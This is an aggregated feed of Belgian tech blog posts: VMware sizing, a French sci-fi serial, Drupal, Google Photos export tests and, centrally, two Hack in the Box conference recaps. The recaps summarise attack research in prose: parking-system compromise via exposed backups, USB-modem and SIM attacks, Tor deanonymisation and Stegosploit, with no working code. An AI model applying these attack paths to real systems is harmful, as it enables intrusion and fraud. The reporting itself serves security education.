fuseserviceworks_workshop

 

/!\ Do not forget to register at the following URL :

http://www.redhatonline.com/benelux/workshops.php

Kind Regards

Frederic


by Frederic Hornain at June 02, 2015 09:08 AM

Bert de Bruijn

VCSA detailed sizing options

The vCenter Server Appliance in vSphere6 can be deployed as "tiny", "small", "medium", and "large". The deployment wizard gives info about the vCPU and vRAM consequences of this choice, and about the total disk size of the appliance. But as there's 11 (eleven!) disks attached to the VCSA appliance, it's worth looking into which disks get a different size.

TinySmallMedium
Max hosts10100400
Max VMs10010004000
vCPU248
vRAM81624
Disk size120150300
disk0/ and /boot121212
disk1/tmp/mount1,31,31,3
disk2swap252550
disk3/storage/core255050
disk4/storage/log101025
disk5/storage/db101025
disk6/storage/dblog5510
disk7/storage/seat102550
disk8/storage/netdump1110
disk9/storage/autodeploy101025
disk10/storage/invsvc51025

N.B. I currently don't have the config data for "large".
This table can help if your environment is growing slightly or wildly beyond the original sizing of the VCSA. Using the autogrow command in @lamw's article, you can easily grow the relevant parts of the VCSA VM.

by Bert de Bruijn (noreply@blogger.com) at June 02, 2015 07:55 AM

June 01, 2015

Lionel Dricot

Printeurs 30

12067487545_107f43edcf_z
Ceci est le billet 30 sur 31 dans la série Printeurs

Utilisant un avatar, Nellio est parvenu jusqu’au printeur dans son labo secret. Il a lancé l’impression de la mystérieuse carte mémoire. Mais les policiers, guidés par Georges Farreck, sont à la porte.

 

La porte du laboratoire vient de sauter. Paniqué, je me retourne. Le printeur est en pleine action: un vent terrible balaie la pièce, un bruit de tempête bourdonne à mes oreilles, le liquide d’impression bout.

Les cris des policiers me parviennent. Je risque un œil par dessus la montagne de débris qui me sert de barricade. Une fusée jaillit de mon bras et explose en flammes à leurs pieds.
— Mais…
— C’est moi, me rassure la voix de Junior. Je contrôle l’armement. Contente-toi de les regarder, je balance la purée. La majeure partie de ta défense est de toutes façons assurée par des algorithmes automatiques.

Un déluge de feu et de hurlements se déchaînent vers l’entrée du laboratoire. Je me sens totalement passif, déconnecté. Déboussolé, je tourne en vain la tête en tout sens. Des coups de feu jaillissent de mes mains, de mon torse et de ma tête mais je ne contrôle rien. Un uniforme de policier que je n’avais pas vu apparaît soudain face à moi. Il doit avoir rampé le long des murs. Mon coeur s’arrête un instant alors que je le vois lever une arme vers mon visage. J’observe trois brefs éclairs avant d’entendre trois détonations. Je ne sens rien. Sous le casque, le visage se décompose. Le visage d’une jeune femme d’une vingtaine d’années semblable à toutes les jeunes femmes que j’ai fréquenté.
— Merde ! Un avat…
Un trou rouge se dessine sur son front et, comme au ralenti, je vois ses yeux se révulser. Elle tente un dernier sursaut incrédule avant de s’affaisser à mes pieds, les bras étrangement désarticulés trempant dans la cuve du printeur. Ses yeux ouverts continuent à me fixer par delà la mort. Je l’ai tuée ! J’ai tué un humain ! Ou n’était-ce qu’un policier ? Est-ce bien moi le coupable ? Est-ce mon corps ? Et qui le contrôle ? Qui a pressé la détente ? Junior, l’algorithme ou mon propre subconscient ?

Une explosion violente retentit et la scène semble se figer. Un épais silence s’installe dans notre ancien laboratoire. Seul me parvient encore le clapotis du printeur.
— Première vague repoussée, m’annonce Junior. Ils se replient pour préparer la seconde vague. Cela peut prendre plusieurs heures. Tactique classique en cas de résistance imprévue. Ils pensent sans doute que nous sommes plusieurs, cela va nous donner l’opportunité de filer. Où en est l’impression ?

Je baisse les yeux. Dans la cuve de fortune, une masse rougeâtre et filandreuse a fait son apparition alors que le corps sans vie du policier semble se décomposer.
— Nom d’un processeur ! Un corps humain !
Le rouge des muscles se couvre rapidement d’une peau matte et foncée. Je manque de hurler.
— Eva !
Le son n’a pas finit de franchir mes temporaires lèvres de métal que ses yeux s’ouvrent. Durant une éternité, son regard semble fixer le plafond. Je n’ose effectuer le moindre mouvement, le temps s’est arrêté.

Et puis, brusquement, son visage émerge du liquide d’impression et se met à hurler. Un hurlement rauque, inhumain, un feulement, une agonie. Elle hurle en se débattant, se contorsionnant. Son corps nu glisse hors de la baignoire improvisée. Couchée sur le sol, elle semble reprendre son souffle avec difficulté. Du bout des doigts, elle touche sa peau, son avant bras, son visage. Et se remet à hurler.

Maladroitement, je m’approche d’elle et tente de la rassurer.
— Eva ! Eva ! C’est moi, Nellio !
Ses grands yeux effrayés croisent mon regard électronique. Je sens qu’elle essaie de me dire quelque chose mais ses lèvres ne sont qu’un cri de détresse infinie. La voix de Junior me parvient. Il semble sous le choc.
— Merde… Nellio… Ne me dis pas que…
— Si, c’est Eva. Elle s’est scannée pour sauver sa peau.
— Merde… Merde… Merde… C’est pas croyable ça !
— Mais ce n’était pas censé fonctionner pour les êtres vivants…
— Et bien si tu veux mon avis, ça n’a pas l’air de fonctionner super bien. Ou, en tout cas, c’est extrêmement douloureux.

Le laissant à son soliloque ponctué de « Merde ! », j’entoure Eva de mes bras. Arrachant un morceau de tissu quelconque des décombres, je protège ses épaules et la serre contre moi. Inlassablement, je murmure.
— Eva, c’est moi, Nellio !
Son long cri finit par se calmer et se transforme en hoquet saccadé. Sa respiration semble pénible, forcée. Elle tourne vers moi un visage inondé de larmes. Ses lèvres frémissantes tentent avec peine de former un mot. Elle déglutit, crache, tousse et articule finalement :
— Nel… lio ?
— Oui Eva, c’est moi !
Ses yeux se ferment et elle tombe, inerte, dans mes bras.
— Eva ? Eva ?
Je tente de la réveiller, de lui faire reprendre conscience. Une vague de panique m’envahit. Et si le printeur ne fonctionnait réellement pas pour les êtres vivants ?
— Eva ? Eva ?
Écartant ma main, je constate une petite plaie rouge sur son épaule, à l’endroit exact où je la tenais.
— Qu’est-ce que…
— Ne t’inquiète pas Nellio, je lui ai administré un sédatif. Il faut que nous sortions d’ici avant la deuxième vague.
— Quoi ? Un sédatif ? Mais tu l’as peut-être tuée espèce de salopard ! Tu ne sais rien de son corps et…
— Stop ! Tu arrêtes tout de suite ! On règlera nos comptes après. Pour le moment, nous avons un intérêt commun : ramener l’avatar et Eva en sécurité. Le reste peut attendre.

Je rêve ! Eva revient à la vie, ce type me la tue aussitôt et il voudrait que je lui obéisse ? Mais c’est quoi ce délire ?
— Salopard, tu es un traître, je le savais depuis le début, tu as…

Aucun son ne sort plus de mes lèvres. Autour de moi, tout est devenu soudainement sombre et calme. Je suis dans un hangar. Contre le mur qui me fait face je distingue vaguement un alignement de silhouettes immobiles. Des avatars ! J’ai beau essayer de tourner la tête, mon regard est définitivement fixe. Je veux avancer, bouger. Rien à faire, mon avatar semble déconnecté. Je crie mais aucun son ne me parvient. Un épais sentiment de claustrophobie m’étreint la poitrine. Eva et Junior me sont sorti de l’esprit, je ne pense qu’à une chose : bouger ou sortir de ce corps éteint !

Le temps lui-même semble avoir disparu. Je n’ai aucun moyen d’évaluer depuis quand je suis dans ce hangar. Même les battements de mon cœur ont disparu ! Suis-je fou ? Suis-je enfermé depuis des années ou seulement depuis quelques secondes ? Comment savoir ?

Un néon clignote brusquement. Une porte se referme. Des pas. Deux être humains se rapprochent. Ami ou ennemi ? Peu me chaut, il faut que je sorte d’ici.
— Aidez-moi ! Je suis ici ! Pitié !
Mais, bien entendu, je n’émet aucun son.

Les deux silhouettes se rapprochent et s’arrêtent en face de moi. Deux femmes en tenue de travail, casquettes vissées sur la tête. Je tente de concentrer mon regard sur elles, de leur faire comprendre que j’existe.
— C’est celui-ci ? fait la plus grande des deux en pointant mon voisin de droite.
— Oui, répond l’autre. Les capteurs visuels présentent des défaillances.
— Retire-les, on va voir ce qu’on peut faire à l’atelier ! Et remplace les capteurs par ceux de celui-ci ! C’est un modèle qui ne sort pas et qui sert pour les pièces détachée.

J’entends un grincement sur le sol. Du coin de l’œil, je les vois tirer une escabelle de métal vers moi. Le visage de la plus petite apparait soudainement dans mon champs de vision. Son nez frôle le mien. Elle tient un tournevis automatique qu’elle approche de mon œil. Je hurle, je me débats. La pointe du tournevis emplit mon champs de vision, un petit bruit de moteur suivi d’un grincement se fait entendre. Noir.

Je suis désormais plongé dans l’obscurité absolue. J’entends le couinement de l’escabelle qu’on déplace, le bruit de la visseuse.
— Voilà, au moins celui-ci est opérationnel.
— Parfait, portons le capteur à l’atelier.
Respirations. Rangement de matériel suivi de pas qui s’éloignent et de la porte qui se referme. Noir.

Je suis seul dans le noir absolu. J’aimerais pleurer, greloter ou même ressentir. Je n’ai que le noir…
— Eva…

 

Photo par 7th Army JMTC.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

Flattr this!

by Lionel Dricot at June 01, 2015 04:09 PM

Dries Buytaert

State of Drupal presentation (May 2015)

I gave my State of Drupal presentation at DrupalCon Los Angeles in front of 3,000+ attendees. In case you didn't attend DrupalCon Los Angeles, you can watch the recording of my keynote or download a copy of my slides (PDF, 77 MB).

In the first part of the keynote, I talked about the history of the Drupal project, some of the challenges we overcame, and some of the lessons learned. While I have talked about our history in the past, it had been 6 years ago at DrupalCon Washington DC in 2009. In those 6 years, the Drupal community has grown so large that most people in the community don't know where we came from. Understanding the history of Drupal is important; it explains our culture, it holds us together in challenging times and provides a compass for where we are heading.

In the middle part of the keynote, I talked about what I believe is one of our biggest challenges; motivating more organizations to contribute more meaingfully to Drupal's development. Just as it is important to understand the history of Drupal, talking about the present is an important foundation for everyone in the community. It is hard to grow without the context of our current state.

In the third and last part of the keynote, I looked forward, talked about my vision for the big reverse of the web and how it relates to Drupal. The way the web is evolving provides us an opportunity to better understand our sites visitors or users and to build one-to-one relationships, something that much of our society has lost with the industrial revolution. If the web evolves the way I think it will, it will be both life changing and industry changing. While it won't be without concerns, we have a huge opportunity ahead of us, and Drupal 8 will help us build towards that future.

I'm proud of where we came from and excited for where we are headed. Take a look at the keynote if you want to learn more about it.

by Dries at June 01, 2015 02:27 PM

May 30, 2015

Ruben Vermeersch

Google Photos - Can I get out?

Google Photos

Google Photos came out a couple of days ago and well, it looks great.

But it begs the question: what happens with my photos once I hand them over? Should I want to move elsewhere, what are my options?

Question 1: Does it take good care of my photos?

Good news: if you choose to backup originals (the non-free version), everything you put in will come back out unmodified. I tested this with a couple different file types: plain JPEGs, RAW files and movies.

Once uploaded, you can download each file one-by-one through the action buttons on the top-right of your screen:

Photo actions

Downloaded photos have matching checksums, so that’s positive. It does what it promises.

Update: not quite, see below

Question 2: Can I get my photos out?

As mentioned before there’s the download button. This gives you one photo at a time, which isn’t much of an option if you have a rather large library.

You can make a selection and download them as a zip file:

Bulk download

Only downside is that it doesn’t work. Once the selection is large enough, it silently fails.

There is another option, slightly more hidden:

Show in Google Drive

You can enable a magic “Google Photos” folder in the settings menu, which will then show up in Google Drive.

Combined with the desktop app, it allows you to sync back your collection to your machine.

I once again did my comparison test. See if you can spot the problem.

Original file:

$ ls -al _MG_1379.CR2 
-rwxr-xr-x@ 1 ruben  staff  16800206 Oct 10  2012 _MG_1379.CR2*
$ shasum -a 256 _MG_1379.CR2 
fbfb86dac6d24c6b25d931628d24b779f1bb95f9f93c99c5f8c95a8cd100e458  _MG_1379.CR2

File synced from Google Drive:

$ ls -al _MG_1379.CR2 
-rw-------  1 ruben  staff  1989894 May 30 18:38 _MG_1379.CR2
$ shasum -a 256 _MG_1379.CR2 
0769b7e68a092421c5b8176a9c098d4aa326dfae939518ad23d3d62d78d8979a  _MG_1379.CR2

My 16Mb RAW file has been compressed into something under 2Mb. That’s… bad.

Question 3: What about metadata?

Despite all the machine learning and computer vision technology, you’ll still want to label your events manually. There’s no way Google will know that “Trip to Thailand” should actually be labeled “Honeymoon”.

But once you do all that work, can you export the metadata?

As it stands, there doesn’t seem to be any way to do so. No API in sight (for now?).

Update: It’s supported in Google Takeout. But that’s still a manual (and painful) task. I’d love to be able to do continuous backups through an API.

Recommendations

The apps, the syncing, the sharing, it works really really well. But for now it seems to be a one-way story. If you use Google Photos, I highly recommend you keep a copy of your photos elsewhere. You might want them back one day.

What I’d really like to see:

Keeping an eye on it.


Comments | @rubenv on Twitter

May 30, 2015 07:18 PM

May 29, 2015

Xavier Mertens

HITB Amsterdam Wrap-Up Day #2

HITB GoodiesI left Amsterdam after the closing keynote and I just arrived at home. This is my quick wrap-up for the second day of Hack in the Box!

The second keynote was presented by John Matherly: “The return of the Dragons”. John is the guy behind Shodan, the popular devices search engine. Shodan started because Nmap was not designed to scan the whole Internet. With Shodan, Stateless scanning is used. Today, technologies allow to scan one specific port on the Internet in less time than making a coffee. Shodan allows security researchers to request some specific scan on their projects. If the search engine is of course used by attackers to perform reconnaissance phases, it can also be used for many other purposes like:

John on stage

John insisted in the IoT hot topic with many examples. Such devices tend to be connected on mobile networks. It makes them very difficult to contact the owner to say “Fix your shit”. Many IoT devices also completely ignore our privacy and can expose sensitive data about our life, health. If you’re interested in IoT security, have a look at the iotdb on github.com, another project maintained by Shodan (Internet of Things nmap fingerprints). For sure, IoT are a pain and they will enforce their position of major threat in the near future.

After the first coffee break, I attended a talk by Filippo Valsorda and George Tankersley about Tor: “Non-hidden hidden services considered harmful: Attacks and detection”. Everybody knows Tor but what about the underlying protocol? Hidden services is a Tor feature which provides bidirectional anonymity and support generic services. They are identified with the .onion TLD. Well known example are drug markets ;-).

Filippo & George on stage

Services are published in a database that is a DHT (Distributed Hash Table) and the question is: How do we choose where to publish this database? The speakers explained the process of HSDir selection. Why is it critical? Hidden services users are facing a greater risks of de-anonymisation that regular Tor users. See the published slides for the details. The problem is low-latency implies correlation attacks (worried about entry and exit nodes). You can of course run your own HSDir and it will receive a subset of hidden service look-ups from users (after a few days). This will help in mapping relative popular hidden services. They explained how useful information can be collected by running your own HSDir (you can trust it if you run it yourself). Finally, as a conclusion, they presented the tool that developed to analyse Tor HSDirs (available here). Nice presentation but, if you are interesting in this topic, I recommend you to read the slides which contains a lot of details.

Then, back in track one, Lucas de Fulgentis presented “The Windows Phone Freakshow”. His research was based on the following process: installation of apps, extraction of binaries, decompilation and review. Guess what? He discovered lot of bad stuff. Windows phone apps can be bases on two technologies: SilverLight or Windows Runtime. The result of his research is some kind of catalog of bad API usages that he called “freaks”. A freak is just an example of vulnerable code.

Lucas on stage

The first freak presented was: self-defending apps. A lack of binary protection results in an app that can be analysed, reverse-engineered and modified. This is possible due to a lack of anti-debugging, obfuscation and resources integrity (+/-95% of tested apps lack of proper binary protection). There are tools like dofFuscator that helps to protest binaries. Keep in mind that binary protections simply mitigate but do not solve binary attacks. The next freak: data transport security. It concerns the transmission of sensitive data over unencrypted channels. Common issues are: No HTTPS and vulnerable to Mitm. As example, Lucas demonstrated how to abuse a vulnerable CNN application by changing or adding a breaking news. More applications are vulnerable: LinkedIn, eBay, e-banking applications. A good tip is to use SSL everywhere.  Windows Phone 8 automatically discard invalid certificates. But if the CA is compromized and the attacker generates malicious cerfificates, the problem remains! To protect against this, implement certificate pinning. Next freak; data storage security. WP8 supports BitLocker (AES128) but… it is disabled by default (I t can be enable via an ActiveSync policy). The device physical memory attacks allow access to some content. Do we really need sensitive data on our mobile device? Data can be stored in 3 locations: File system, external SD card or in the cloud. A common issue with credentials? There are stored in plain text! Use the DataProtection API. There is also a PasswordVault class available. The other freaks reviewed by Lucas: data leakage (involuntary data disclosure due to a side effect, authentication and authorisation and, last but not least, client side injection. For this point, a key point is to never trust data from the wild. “All input is evil” as said Lucas. Using an undocumented IPC call (Shell_PostMessageToast), Lucas demonstrated how to bypass the 4-digits PIN code protection in the DropBox application. Being a contributor to the OWASP Mobile Security Project, Lucas demonstrated the vulnerabilities and also the countermeasures that are available for the developers. Very nice talk!

After a good lunch and interesting discussions with peers, the last half-day started with Julien Vehent from Mozzila who presented “Mozilla Investigator: Distributed and real-time digital forensics at the speed of the cloud”. MIG = “Mozilla InvestiGator”. Mozilla has approx 15000 servers.

Mozilla InvestiGator

It’s a challenge to monitor this and perform security operations. Julien explained what IOC’s are (“Indicator of Compromise”) like IP addresses, filenames, hashes, URLs, domains, … ). The good point, they can be shared! A security incident can be caused by internal mistakes. Did you know the unfortunate commit?

$ git commit -a . &&& git push github master

Password or credentials can be leaked in this case. How to know the impact on the completed infrastructure based on thousands of server? Mozilla’s goal is to build a safer Internet with a strong startup/incubator mindeset. As said Julien, they experiment and fail fast. The current infrastructure is based on 400+ active websites, a dozen of offices, remote workers, 2 data centers, tons of AWS accounts. How to do incident response in such environemnet (it’s like looking for a needle). For Julioen, the  OpSec problems are:

The faster we can investigate, more we will find but Mozilla followed this principle: “If you can’t find the right tool, write your own”. Julien demonstrate some usage of MIG.

Example 1: Locating a cron job that contains a password:

$ mig file -e 30s -path /etc/cron.d -content “badpassword”

Example 2: Is that bonet IP connected anywhere?

$ mig netstat -e 20s -ci 78.204.52.20

Each server is running an agent connected to a RabbitMQ relay. MIG is light, written in Go, one static bin, config is pushed by tools like Puppet. Julien reviewed all the securty controls in place to let the agent work safely:  Intensive use of PGP, no raw data returned to the server, ACLs. It looks to be a very powerful tool! MIG is available here.

The next talk is the one that everybody expects at security conference: It focus on infrastructures that everybody used in his/her day life: Parking systems. Jose Antion Guasch started this research a few years ago during his spare time and fully compromised the parking system of a well know vendor (not disclosed). His talk title was “Yes Parking: Remotely Owning “Secure” Parking Systems”’.

Jose on stage

This time, no SCADA devices, no complex technical skills but classic vulnerabilities like we can find on plenty of vulnerable web servers. But focus on public parkings? They have complex infrastructures and there is money involved! (a lot of!). For Jose, a kid’s dream was to play with the parking gates just by clicking on a button and he succeeded. Every started with a simple login page. The rest of the research was based on the same structure as a classic pentest: information gathering, enumeration, analysts, exploitation, etc. A parking system is based on main components:

Behind those components, we find dump personal computers connected to a network. Jose analysed different versions of the application (which changed after the original company was taken over by another one. For the old version, it was piece of cake. To resume: Indexable directory on the management server, a directory /backup with database dumps, restore the last one, get credentials and use them. Game over! For the other versions, it was a little bit more complex but the systems got also pwned. There, Jose found credit card numbers and was able to play with the gates, record new notification messages. But a real attacker could be much more evil by selling back monthly tickets, CC, monitoring people, controlling license plates.

Old version: Directory index -> /backup directory -> database dump -> restore the last one -> Get credentials -> game over

The newest version was more difficult to pwn but it remained vulnerable… Bad passwords (again), credit card numbers in clear text, hability to record new voice messages, play with gates, … Of course, a real attacker will play more evil and resell monthly tickets, lists of CC, monitor people, control license plates, …  Jose’s advice to the application owners: Don’t put anything online, harden, don’t use default config and restrict accesses!

The last talk was presented by Marina Krotofil and Jason Larson: “What you always wanted  and now can: Hacking chemical processes”. They talked about Industrial Control Systems. They are “IT” systems implemented in “physical” systems. Components convert analog to digital signals (ex: temperature, pressure). In traditional security, TLS is the xavier of all things. But different in industrial processes, the process can’t stop due to an IT issue. Can you imagine: crypto key invalid => stop the process? Industrial systems can be controlled without modifiing the content of the message!

Marina & Jason on stage

After a SCACA 101 5 mins sessions (always useful), they came back to process manipulation. In some process, the freshness of data is critical. They reviewed different types of attacks and their impact on a plant.

And for the closing keynote, the word was given to Runa A. Sandvick. She talked about “Bringing security and privacy to where the wild thing are”. Runa’s talk was addressing the securiy communitty but without technical content, only nice facts and ideas. She worked on projects like Tor and the Freedom of the Press association.

Runa on stage

What’s the link with IoT and mobile phones? Back in 2010, we discovered that apps are leaking data to external services (ex: the Pandora music app). Another example, a riffle running Linux and connecting to apps… Drones with a mobile phone and Wireless toys, etc. Keep in mind: “Just because you can does not mean you should”. So what do we do it? Exciting? Innovation? Managing expectation. Nobody takes care of updates on mobile phones. What if the OS reaches its end of life? No more updates? From a baseline and building on it. Baseline changes in time… Today the new baseline has many more options (example was given with cars). Why don’t we have the same reflex with electronic devices? “NSA-proof” is a term created by journalists. What does it mean really? We, as community, can help journalists to help to better understand. But hackers also do mistakes with logos, brands, … Think about the latest one, VENOW… We can do better! Security vs privacy. New roles are coming which replace the workd security by privacy: privacy analysts, privacy engineers, … We need more transparency but often, there is a lack of context. Example: the screen with app permissions on Android. Facebook needs to access the microphone? But in which context?  Where do we go from here? How to educate people? Be responsible (story of Chris Roberts who hacked a plane). Two interesting initiatives mentioned by Runa: I’m The Cavalry and BuiltItSecure.ly. I really liked her keynote which contained interesting ideas to keep in mind and to share!

All the conferences material is already online, I suggest you to download the slides and read them, great content! Next step for me, BSidesLondon next Wednesday!

by Xavier at May 29, 2015 08:48 PM

Frank Goossens

Music from Our Tube: Dutronc’s Responsable

Delicious French sixties pop by Jacques Dutronc on wikipedia, either in this “revisit” by Plaisirs de France or the original embedded here;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

Keep on dancing kids!

by frank at May 29, 2015 06:17 AM

May 28, 2015

Xavier Mertens

HITB Amsterdam Wrap-Up Day #1

HITB Track 1The HITB crew is back in the beautiful city of Amsterdam for a new edition of their security conference. Here is my wrap-up for the first day!

The opening keynote was assigned to Marcia Hofmann who worked for the EFF (the Electronic Frontier Foundation). Her keynote title was: “Fighting for Internet Security in the New Crypto Wars”. EFF always fight for more privacy and she reviewed the history of encryption and all the bad stories about it. It started with a fact: “We need strong encryption but we need some backdoors”. Since encryption algorithms were developed, developers received pressure from governments to implement backdoors or use weak(er) keys to allow interception… just in case of! This already happened before and will happen again.

Marcia on stage

In a prologue, Marcia explained how everything started with the development of RSA and Diffie-Hellman. For some other protocols like DES, it was clear that the development team was very close to the NSA. They deliberately asked to use weakest key to help them to brute-force the keys. In the 80’s and 90’s, cryptography was developed more and more by the private sector and academic researches. Personal computers raised and people started to encrypt their data. Then came the famous PGP, key escrow and clipper chip. Marcia also explained the CALEA (“Communications Assistance Law Enforcement Act”): The technology must be designed in the way the FBI could intercept communications if needed (of course, with a proper warrant). Then came the restriction about encryption stuff export outside the US. It was a good opportunity for Marcia to give some words about the Wassenaar agreement and the recent story about the project to prevent export of intrusion software and surveillance technology. Today, the Snowden era, governments are seen as attackers. NSA was able to tamper all our data but also infiltrated major Internet players. What about the future? What should happened and what should we do? Marcia took a pendular as example. Some forces have impacts on the way a pendula moves. There are different external pressures which affect how security is designed:

I hope that the keynote helped a lot of people to open their eyes about our privacy!

After the morning coffee break, I went to the second track to follow Pedram Hayati’s presentation: “Uncovering Secret Connections Using Network Theory and Custom Honeypots”. The first part gave background information about our classic defence model and honeypots. In a traditional security model, the perimeter is very hardened but once the intruder is inside, nothing can stop him. We keep the focus on making the perimeter stronger. It’s coming from the physical security approach (the old castles) and attackers put all the efforts to bypass a single high barrier. Our second problem? We enter a battle without knowing the attackers. Idea of active defines and protection. Active defines is defined as:

A security approach that actively increases the cost of performing an attack in terms of time, effort and required resources to the point where a successful compromise against a target is impossible.

Pedram on stage

To achieve this, we need:

The Foundation is knowing the attacker! So what tools do we have? Our logs of course but honeypots can be very helpful! In the second part, Pedram explained what honeypots are… “a decoy system to lure attacker”. They increase the cost of a successful attack: the attacker will spend time in the honeypot. It is fundamental that it looks legitimate but it has signatures and behaviour, that’s why it must be fully configurable to lure the attacker. Some principle:

The next section was the experiment. Pedram deployed 13 honeypots in major cloud providers (AWS, Google), distributed across the Internet. They mimic a typical server and have IP addresses not published (no domain mapping). The goal was to identify SSH attacks, discover attacks profile per region and relations between them. How long to detect the first infection? On average, less than 10 mins! An analyse of the collected data was performed and it was possible to classify the attacker in three categories:

Pedram also explained how he generated nice statistics about the attackers, their behaviour and locations. To conclude, he compared the attackers as somebody throwing bricks through windows. How to we react? We can take actions to prevent this guy from sending more bricks or we can buy bullet-proof windows. It’s the same with information security. Try to get rid of the attackers!

My next choice was a talk about mobile phones operators: “Bootkit via SMS: 4G Access Level Security Assessment” presented by Timur Yunusov and Kirill Nesterov. Today, 3G/4G network are not only used by people to surf on Facebook but are also used more and more for M2M (“machine to machine”) communications. They explained that many operators have GGSN (“GPRS Gateway Support Node”) facing the Internet (just use Shodan to find some). A successful attack against such devices can lead to DoS, leak on information, fraud, APN guessing.

Timur & Kirill on stage

BTW, do you know that, when you are out of credit, telco’s block TCP traffic but UDP remains available? It’s time to use your UDP VPN! But attacking the network in this way is not new, the speakers focused on another path: attacking the network via SMS! About the hardware, they investigated some USB modems used by many computers. Such devices are based on Linux/Android/Busybox and have many interesting features. Most of them suffer of basic vulnerabilities like XSS, CSRC, ability to brick the device. They showed a demo video to demonstrate an XSS attack and CSRF to steal the user password. If you can own the device, the next challenge is to own the computer using the USB modem! To achieve this, they successfully turned to modem into an HID device. It is first detected as a classic RNDIS device then it is detected as a keyboard and operates like a Teensy to inject keyboard keypresses. You own the modem, the computer, what about the SIM card? They explained in details how they achieve this step and ended with a demonstration where they remotely cloned a SIM card and captured GSM traffic! The best advice they can give as a concluse: always change your PIN code!

After the lunch, Didier Stevens and myself gave our workshop about the IOS forensics. I did not attend two talks but my next choice was to listen to Bas Venis, a very young security researcher, who talked about browsers: “Exploiting Browsers the Logical Way”. The presentation was based on “logic” bugs. No need to use debuggers and other complicated tools to find such vulnerabilities. Bas explained the Chrome URL spoofing vulnerability and he discovered it (CVE-2013-6636).

Bas on stage

Then he switched to the Flash players. The goal was to evade the sandox. After explaining the different types of sandboxes (remote, local_with_file, local_with_network, local_trusted and application), I explained that the logic of URL/URI is not rock solid in sandboxes and lead to CVE-2014-0535. The conclusion was that looking for logic bugs and using them proven to be a sensitive approach when trying to hack browsers. Sweet results can be found and they do not require tools but just dedication and creativity. Just a remark about the quality of the video, almost unreadable on the big plasma screens installed in the room.

Finally, the first day ended with a rock-start: Saumil Shah who presented “Stegosploit: Hacking with Pictures”. This presentation is the next step in Saumil’s research about owning the user with pictures. In 2014 at hack.lu, he already presented “Hacking with pictures”. What’s new? Saumil insisted in the fact that “A good exploit is one delivered with style”. Pwning the browser can be complicated, why not just find a way to simple trick the exploit? The first part was a review of the history of steganography which is a technique used to hide a message into a picture, without altering it. Then came the principle of GIFAR: One file file with a JAR file appended to it. Then webshells raised with the embedding of tags like “<?php>” or “<% … %>”. Finally EXIF data were used (example to deliver a XSS).

Saumil on stage

Stegosploit is not a new 0-day exploit with a nice name and logo. It’s a technique to deliver browser exploits via pictures. To achieve this we need an attack payload, a “safe” decoder which can transform pixels into dangerous data. How?

How to decode in the browser? Using the HTML5 CANVAS (so, only available in modern browsers). The next step is to run the decoder automatically in the browser. To achieve this, we have IMAJS, depending on the tag used, a browser will display an image or execute it. Why is this attack possible? Because browsers follows this principle:
Be conservative in what you send and liberal in what you receive. (Jon Postel)
Browsers accept unknown tags and get pwned! The talk ended with some nice demos of exploits popping up calc.exe or Meterpreter sessions. Keep an eye on this technique, it’s amazing to own a user!

This closed the first day! Note that slides are uploaded after each talk and available here.

by Xavier at May 28, 2015 09:08 PM

Mattias Geniar

Google Jump: VR For The Masses

The post Google Jump: VR For The Masses appeared first on ma.ttias.be.

They had already made commodity-class hardware in cloud a standard and their R&D team seems to be heading the same way for Virtual Reality, too.

From a cardboard Virtual Reality goggle to affordable VR recording. Impressive stuff.

GoPro's Jump-ready 360 camera array uses HERO4 camera modules and allows all 16 cameras to act as one. It makes camera syncing easy, and includes features like shared settings and frame-level synchronization.
Google Jump

If this works as simple as advertised we'll be seeing a lot of VR content in the nearby future.

Is Virtual Reality on the web really the next step?

The post Google Jump: VR For The Masses appeared first on ma.ttias.be.

by Mattias Geniar at May 28, 2015 07:11 PM

Les Jeudis du Libre

Arlon, le 4 juin, S01E03 : On fait la Java dans Scala

Logo de ScalaJeudi 4 juin à 19h, les Jeudis du Libre d’Arlon vous proposent un opéra en 5 actes sur le langage de programmation Scala :

Sur la scène, le ténor sera Alexis Vandendaele, développeur Java chez Sfeir et passionné pour les nouvelles technologies montantes web ou non. L’objectif de sa conférence sera de vous présenter une vue d’ensemble des capacités du Scala afin de le démystifier.

Le lieu : InforJeunes Arlon (1er étage), Place Didier, 31 à 6700 Arlon
Pour les détails et  inscriptions, c’est ici !
Pour des renseignement complémentaires, contactez l’ASBL 6×7.

by Didier Villers at May 28, 2015 07:26 AM

May 27, 2015

Frank Goossens

Firefox: how to enable the built-in tracking protection

Just read an article on BBC News that starts of with the AdBlock Plus team winning another case in a German court (yeay) and ended with a report on how Firefox also has built-in tracking protection which -for now- is off by default and is somewhat hidden. To enable it, just open about:config and set privacy.trackingprotection.enabled to true. I disabled Ghostery for now, let’s see how how things go from here.

by frank at May 27, 2015 04:46 PM

Autoptimize: video tutorial en Espanõl!

The webempresa.com team contacted me a couple of days ago to let me know they created a small tutorial on the installation & basic configuration of Autoptimize, including this video of the process;

YouTube Video
Watch this video on YouTube or on Easy Youtube.

The slowdown noticed when activating JS optimization is due to the relative cost of aggregating & minifying the JS. To avoid this overhead for each request, implementing a page caching solution (e.g. HyperCache plugin or a Varnish-based solution) is warmly recommended.

Muchas gracias Webempresa!

by frank at May 27, 2015 03:34 PM

May 26, 2015

Mattias Geniar

iOS9 Major Feature: Fixing The Shift Key

The post iOS9 Major Feature: Fixing The Shift Key appeared first on ma.ttias.be.

I may be an Apple fan, but I LOL'd at this major feature that leaked.

Alongside this, the company plans to tweak the keyboard to work better in both landscape and portrait keyboard mode and will make it easier to tell when the shift key is selected.

iOS 9 to reportedly support Force Touch, fix shift key and open up Apple Pay to Canada

If new OS details leak and they mention fixing the shift key, you're doing something wrong.

The post iOS9 Major Feature: Fixing The Shift Key appeared first on ma.ttias.be.

by Mattias Geniar at May 26, 2015 06:51 PM

Bert de Bruijn

which vSphere version is my VM running on?

(an update of an older post, now complete up to vSphere 6)

Your Linux runs on a VMware VM, but which on which ESXi version? You can see for yourself: run "dmidecode" and look at lines 10, 11 and 12.
ESX 2.5 - BIOS Release Date: 04/21/2004 - Address 0xE8480 - Size 97152 bytes
ESX 3.0 - BIOS Release Date: 04/17/2006 - Address 0xE7C70 - Size 99216 bytes
ESX 3.5 - BIOS Release Date: 01/30/2008 - Address 0xE7910 - Size 100080 bytes
ESX 4 - BIOS Release Date: 08/15/2008 - Address 0xEA6C0 - Size 88384 bytes
